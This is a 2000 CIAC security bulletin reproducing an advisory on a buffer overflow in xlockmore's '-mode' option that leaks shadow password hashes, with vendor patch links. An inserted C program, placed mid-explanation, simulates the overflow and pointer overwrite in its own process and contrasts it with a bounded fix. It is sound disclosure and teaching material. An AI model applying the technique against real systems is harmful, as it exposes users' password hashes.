__________________________________________________________

                       The U.S. Department of Energy
                   Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
__________________________________________________________

                             INFORMATION BULLETIN

                LINUX/BSD Initialized data overflow in Xlockmore

October 9, 2000 21:00 GMT                                          Number L-001
______________________________________________________________________________
PROBLEM:       The xlockmore program has a buffer overflow in its handling of
               the '-mode' command line option. A local user can use it to
               read part of the xlockmore address space, which holds the
               contents of the shadow password file.

PLATFORM:      FreeBSD versions prior to and including 4.0
               NetBSD versions prior to and including 1.4.2
               OpenBSD versions prior to and including 2.6
               Debian Linux Version 2.1
               SCO Skunkware

DAMAGE:        xlockmore reads the shadow password file while privileged and
               places the password hashes in the initialized data section of
               memory. Privileges are dropped after the user's hash is read,
               but the hashes remain in memory. A malicious local user can
               retrieve the hashes and run a cracker program against them to
               obtain passwords.

SOLUTION:      Upgrade to xlockmore 4.16.1 (or apply the 4.16 to 4.16.1
               patch), or install the vendor update listed in the advisory
               below.
______________________________________________________________________________
VULNERABILITY  The risk is HIGH: system passwords can be compromised, and an
ASSESSMENT:    exploit is publicly available.
______________________________________________________________________________

[****** Begin Beyond-Security's SecuriTeam Advisory ******]

Title:   Initialized data overflow in Xlock
Date:    30/5/2000

Summary

An implementation flaw in xlock allows global variables in the initialized
data section of memory to be overwritten. This opens a security hole where
local users can view the contents of xlock's memory, including the shadowed
password file, after root privileges have been dropped.

Details

Vulnerable systems: All versions of xlockmore prior to and including 4.16 are
vulnerable.

The xlock program locks an X server until a valid password is entered.
The command line option -mode lets a user change the default display shown
while the X server is locked. Xlock is installed with the privileges needed to
obtain password information, although these are dropped as quickly as
possible. An overflow in the handling of the -mode command line option allows
a local attacker to reveal arbitrary portions of xlock's address space,
including the shadow password file.

The buffer overflow in xlock is not a traditional overflow: it is reached only
after all privileges have been dropped, so the aim is not code execution but
disclosure of memory. The variables overflowed are globals in the initialized
data section (.data), and no shellcode is used for exploitation.

Upon initialization, xlock reads the shadow password file to obtain the
current user's password hash and then immediately relinquishes privileges.
The password hashes, including those not belonging to the user running xlock,
remain in memory and continue to be accessible to xlock.

When the -mode command line option is specified, a strcpy() occurs in the
function checkResources(). The argument to -mode is copied into a small buffer
in the initialized data section (.data) called old_default_mode. If an
arbitrarily large command line argument is specified, numerous global
variables in the initialized data section are overrun, including genTable,
modeTable, cmdlineTable, earlyCmdlineTable, and opDesc.

When an unknown -mode type is specified, for example when a large command line
argument is provided, the program exits through a function called Syntax(),
defined in resources.c. The purpose of Syntax() is to report any "bad command
line options" and then print a complete list of the correct options. Syntax()
uses the global variable opDesc, which can be overwritten via the argument to
-mode. The opDesc buffer is an array of OptionStruct structures, each
containing two character pointers, as defined in mode.h.
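The following C program is an added worked model of the overflow and of the Syntax() walk described in these Details; it is not xlockmore's source. Its buffer size (16 bytes for old_default_mode), its three-entry option table, the placement of the shadow lines in one heap block, the constructed shadow line, the assumption of a 64-bit little-endian host, and the length check used as the fix are all assumptions made for the example.

```c
/* Model of the xlockmore -mode overflow and Syntax() walk (added example, not
 * xlockmore source). Assumed: 16-byte old_default_mode, three-entry opDesc,
 * shadow lines held in one heap block, 64-bit little-endian userland, and a
 * length check as the fix.  Build: cc -O2 xlock_model.c */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct { const char *name; const char *desc; } OptionStruct; /* as in mode.h */

/* The overrun globals as one struct, so old_default_mode is guaranteed to sit
 * directly in front of opDesc whatever the linker would have done. */
struct data_section { char old_default_mode[16]; OptionStruct opDesc[3]; };
_Static_assert(sizeof(void *) == 8 && offsetof(struct data_section, opDesc) == 16,
               "model assumes 64-bit pointers right after a 16-byte buffer");
static struct data_section data;
static const OptionStruct opDesc_orig[3] = {
    { "-mode", "animation to display" }, { "-delay", "microseconds between frames" },
    { "-nolock", "run as a screensaver only" } };
#define NOPTS (sizeof data.opDesc / sizeof data.opDesc[0])
static void reset_data(void) { memset(&data, 0, sizeof data); memcpy(data.opDesc, opDesc_orig, sizeof data.opDesc); }
static int opdesc_intact(void) { return memcmp(data.opDesc, opDesc_orig, sizeof data.opDesc) == 0; }

/* Constructed stand-in for the shadow lines xlock read while privileged; a 1 MiB
 * heap block is filled with copies so that some copy has a NUL-free address. */
static const char shadow_line[] = "root:$1$Zq1QmbFi$8kYr4Vz0xEPxkz8cGr8O8/:11250:0:99999:7:::";
#define SHADOW_REGION (1u << 20)
static char *shadow_region;
static void load_shadow(void) {
    if (shadow_region) return;
    if (!(shadow_region = malloc(SHADOW_REGION))) exit(1);
    for (size_t off = 0; off + sizeof shadow_line <= SHADOW_REGION; off += sizeof shadow_line)
        memcpy(shadow_region + off, shadow_line, sizeof shadow_line);
}

/* checkResources() as described: unbounded strcpy() into a .data buffer. The
 * volatile pointer hides the 16-byte object from _FORTIFY_SOURCE, which would
 * otherwise abort the copy; the binaries of 2000 had no such check. */
static void checkResources_vuln(const char *mode) {
    char *volatile dst = data.old_default_mode;
    strcpy(dst, mode);
}
/* Bounded replacement: refuse anything that does not fit together with its NUL. */
static int checkResources_fixed(const char *mode) {
    if (strlen(mode) >= sizeof data.old_default_mode) return 0;
    strcpy(data.old_default_mode, mode);
    return 1;
}

/* Syntax(): list every option name and description from opDesc into a static
 * buffer (returned) so the caller can see exactly what would be printed. */
static char syntax_out[1024];
static const char *Syntax(void) {
    size_t n = 0;
    syntax_out[0] = '\0';
    for (size_t i = 0; i < NOPTS && n < sizeof syntax_out; i++)
        n += (size_t)snprintf(syntax_out + n, sizeof syntax_out - n, "%s\t%s\n",
                              data.opDesc[i].name, data.opDesc[i].desc);
    return syntax_out;
}

/* strcpy() stops at the first NUL, so it can carry at most the low six bytes of
 * a pointer, and only when none of them is zero. */
static int low6_nul_free(const void *p) {
    uintptr_t a = (uintptr_t)p;
    for (int b = 0; b < 6; b++) if (((a >> (8 * b)) & 0xff) == 0) return 0;
    return 1;
}
/* -mode argument: 16 filler bytes up to opDesc[0].name, then the low six bytes of
 * target. strcpy() puts its NUL in byte 6; byte 7 keeps the zero the original
 * (valid, canonical) pointer already had, so the slot ends up holding target. */
static void craft_mode_arg(char arg[24], const char *target) {
    uintptr_t a = (uintptr_t)target;
    memset(arg, 'A', 16);
    for (int b = 0; b < 6; b++) arg[16 + b] = (char)((a >> (8 * b)) & 0xff);
    arg[22] = '\0';
}

/* 1: Syntax() printed a shadow line; -1: no shadow address in this process can
 * be carried by strcpy(); 0: overflow landed but nothing leaked. */
static int run_exploit(void) {
    reset_data(); load_shadow();
    const char *target = NULL;
    for (size_t off = 0; !target && off + sizeof shadow_line <= SHADOW_REGION; off += sizeof shadow_line)
        if (low6_nul_free(shadow_region + off)) target = shadow_region + off;
    if (!target) return -1;
    char arg[24];
    craft_mode_arg(arg, target);
    checkResources_vuln(arg);                /* opDesc[0].name now points at the hash */
    return strstr(Syntax(), shadow_line) != NULL;
}
/* Same payload against the bounded copy: rejected, table untouched, nothing leaks. */
static int fixed_rejects_payload(void) {
    reset_data(); load_shadow();
    char arg[24];
    craft_mode_arg(arg, shadow_region);
    return checkResources_fixed(arg) == 0 && opdesc_intact() && !strstr(Syntax(), shadow_line);
}

int main(void) {
    reset_data();
    printf("normal Syntax() output:\n%s\n", Syntax());
    int r = run_exploit();
    if (r == 1) printf("Syntax() after the -mode overflow:\n%s", Syntax());
    else puts(r < 0 ? "no NUL-free shadow address here; strcpy() cannot carry one" : "no leak");
    printf("bounded copy rejects the payload: %s\n", fixed_rejects_payload() ? "yes" : "no");
    return 0;
}
```

Built with `cc -O2` and run, the program prints the normal option list, then the same list with the first option name replaced by the constructed shadow line, and finally that the bounded copy rejects the argument. Two caveats a practitioner should keep in mind: on the i386 systems this advisory covers, a pointer is four bytes and the attacker simply chooses a target address that contains no zero byte, whereas on a 64-bit host strcpy() can only deliver six bytes, so the model relies on the top two bytes of the pointer already in opDesc being zero and has to search for a NUL-free address; and a modern toolchain's _FORTIFY_SOURCE wrappers would catch this particular strcpy() if the destination size were visible to the compiler, which is why the model hides it.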
The first pointer gives the name of a command line option and the second a
description of the option. Syntax() walks the array of OptionStruct structures
in opDesc, printing both the name and the description of each option.
Overwriting opDesc with addresses that point to the copy of the shadow
password file held in memory therefore makes Syntax() print the shadow
password file instead of the command line options.

Solution:

An official xlockmore patch is available at:
ftp://ftp.tux.org/pub/tux/bagleyd/xlockmore/index.html
Download either xlockmore-4.16.1.tar.gz or xlockmore-4.16-4.16.1.diff.gz.

Vendor Information:

FreeBSD
The vulnerable xlockmore is distributed as part of the FreeBSD ports
collection in versions prior to and including 4.0. A new version of xlockmore
can be obtained by downloading a new port skeleton from:
http://www.freebsd.org/ports/

NetBSD
The vulnerable xlockmore is distributed as part of the NetBSD packages
collection in versions prior to and including 1.4.2. Information regarding
the packages collection is available from:
http://www.netbsd.org/Documentation/software/packages.html
Further information for upgrading the xlockmore package can be obtained from:
ftp://ftp.netbsd.org/pub/NetBSD/packages/pkgsrc/x11/xlockmore/README.html

OpenBSD
The vulnerable xlockmore is distributed as part of the OpenBSD ports
collection in versions prior to and including 2.6. OpenBSD 2.7 will ship with
the issue resolved. An OpenBSD 2.6 patch is available from:
http://www.openbsd.org/errata26.html#xlockmore
OpenBSD uses a password scheme built on a 128-bit salted, 2^8-round Blowfish
hash that is designed to resist optimized cracking, which limits what an
attacker gains from the disclosed hashes.
Further information regarding the password scheme and the limitations of
cracking OpenBSD passwords is available from:
http://www.openbsd.org/cgi-bin/man.cgi?query=crypt&sektion=3
http://www.openbsd.org/events.html#usenix99

Debian GNU/Linux
The vulnerable xlockmore was distributed with Debian 2.1; Debian 2.2 and above
are not exploitable since they use PAM. Debian updates are available from:

Source archives:
http://security.debian.org/dists/stable/updates/source/xlockmore_4.12-4.1.diff.gz
http://security.debian.org/dists/stable/updates/source/xlockmore_4.12-4.1.dsc

Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/xlockmore-gl_4.12-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/binary-alpha/xlockmore_4.12-4.1_alpha.deb

Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/xlockmore-gl_4.12-4.1_i386.deb
http://security.debian.org/dists/stable/updates/binary-i386/xlockmore_4.12-4.1_i386.deb

Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/xlockmore-gl_4.12-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/binary-m68k/xlockmore_4.12-4.1_m68k.deb

Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/xlockmore-gl_4.12-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/binary-sparc/xlockmore_4.12-4.1_sparc.deb

TurboLinux
TurboLinux currently does not use shadowed password files, although updates
for the xlockmore package and srpm are available from:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/xlockmore-4.16.1-1.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xlockmore-4.16.1-1.src.rpm
For additional security updates, TurboLinux advisories, and security alert
mailing list information, please visit
http://www.turbolinux.com/security/index.html

SCO OpenServer and UnixWare
Xlockmore is available as part of SCO
Skunkware. A new version of xlockmore that addresses this security
vulnerability is available from:
http://www.sco.com/skunkware

Additional information

The information has been provided by: COVERT Labs

[****** End Beyond-Security's SecuriTeam Advisory ******]
_______________________________________________________________________________

CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam
for the information contained in this bulletin.
_______________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer security
incident response team for the U.S. Department of Energy (DOE) and the
emergency backup response team for the National Institutes of Health (NIH).
CIAC is located at the Lawrence Livermore National Laboratory in Livermore,
California. CIAC is also a founding member of FIRST, the Forum of Incident
Response and Security Teams, a global organization established to foster
cooperation and coordination among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be
contacted at:
    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites, and the
NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one
of the following methods to contact CIAC:

    1.  Call the CIAC voice number 925-422-8193 and leave a message, or
    2.  Call 888-449-8369 to send a Sky Page to the CIAC duty person or
    3.  Send e-mail to 4498369@skytel.com, or
    4.  Call 800-201-9288 for the CIAC Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
   World Wide Web:      http://www.ciac.org/
                        (or http://ciac.llnl.gov -- they're the same machine)
   Anonymous FTP:       ftp.ciac.org
                        (or ciac.llnl.gov -- they're the same machine)
   Modem access:        +1 (925) 423-4753 (28.8K baud)
                        +1 (925) 423-3331 (28.8K baud)

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these communities,
please contact your agency's response team to report incidents. Your agency's
team will coordinate with CIAC. The Forum of Incident Response and Security
Teams (FIRST) is a world-wide organization. A list of FIRST member
organizations and their constituencies can be obtained via WWW at
http://www.first.org/.

This document was prepared as an account of work sponsored by an agency of the
United States Government. Neither the United States Government nor the
University of California nor any of their employees, makes any warranty,
express or implied, or assumes any legal liability or responsibility for the
accuracy, completeness, or usefulness of any information, apparatus, product,
or process disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products, process,
or service by trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or favoring by
the United States Government or the University of California. The views and
opinions of authors expressed herein do not necessarily state or reflect those
of the United States Government or the University of California, and shall not
be used for advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

K-064:  Linux Kernel Capability Vulnerability
K-065:  Microsoft "Specialized Header" Vulnerability
K-066a: IRIX telnetd vulnerability (Revised 9/13/2000)
K-067:  FreeBSD - dhclient vulnerable to malicious dhcp server
K-068:  Automated Web Interface Scans IIS for Multiple Vulnerabilities
K-069:  Input Validation Problem in rpc.statd
K-070:  PGP Additional Decryption Keys ADKs Vulnerability
K-071:  cisco.ciscosecure.acs.vulnerability.txt
K-072:  trinity.stacheldraht.variants.txt*
K-073:  vulnerabilities.firewall.1.txt*